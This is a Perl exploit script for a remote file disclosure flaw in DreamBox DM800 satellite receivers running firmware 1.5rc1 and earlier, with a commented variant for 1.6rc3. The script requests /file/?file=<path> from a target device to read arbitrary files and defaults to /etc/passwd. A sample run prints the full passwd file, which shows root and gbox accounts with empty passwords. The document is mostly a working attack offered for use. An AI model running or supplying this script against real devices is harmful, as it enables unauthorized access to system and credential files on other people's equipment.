#!/usr/bin/perl # DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit # # Author: Todor Donev # Email: todor.donev@@gmail.com # Type: Hardware # Vuln Type: Remote ##### # Product summary: DreamBox DM800 is Powerful receiver # for digital TV and Radio programs based on Linux. # Product web page: http://www.dream-multimedia-tv.de ##### # playground$ perl dreambox.pl target /etc/passwd # [+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit # # root::0:0:root:/home/root:/bin/sh # daemon:*:1:1:daemon:/usr/sbin:/bin/sh # bin:*:2:2:bin:/bin:/bin/sh # sys:*:3:3:sys:/dev:/bin/sh # sync:*:4:65534:sync:/bin:/bin/sync # games:*:5:60:games:/usr/games:/bin/sh # man:*:6:12:man:/var/cache/man:/bin/sh # lp:*:7:7:lp:/var/spool/lpd:/bin/sh # mail:*:8:8:mail:/var/mail:/bin/sh # news:*:9:9:news:/var/spool/news:/bin/sh # uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh # proxy:*:13:13:proxy:/bin:/bin/sh # www-data:*:33:33:www-data:/var/www:/bin/sh # backup:*:34:34:backup:/var/backups:/bin/sh # list:*:38:38:Mailing List Manager:/var/list:/bin/sh # irc:*:39:39:ircd:/var/run/ircd:/bin/sh # gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh # nobody:*:65534:65534:nobody:/nonexistent:/bin/sh # avahi:x:500:64002:Avahi:/var/run/avahi-daemon:/bin/sh # ftp:x:501:64003:Linux User,,,:/var/tmp/ftp:/bin/false # gbox::0:0::/:/bin/sh # # playground$ ##### # Thanks to all my friends and special to the best Tsvetelina Emirska, # that support and respect me !! =) ##### use LWP::Simple; print "[+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure\n"; $host = $ARGV[0]; $d = $ARGV[1]; if(! $ARGV[0]) { print "[!] usg: perl dreambox.pl \n"; exit; } if(! $ARGV[1]) { $d = "/etc/passwd"; } ## Edit here for exploitng DreamBox DM800 <= 1.6rc3 # my $result = get("http://$host/file?file=$d"); ## Greetings for ShellVision who found this bug in version 1.6rc3 my $result = get("http://$host/file/?file=$d"); if (defined $result) { print "\n$result"; } else { print "[-] Not vuln.. =("; }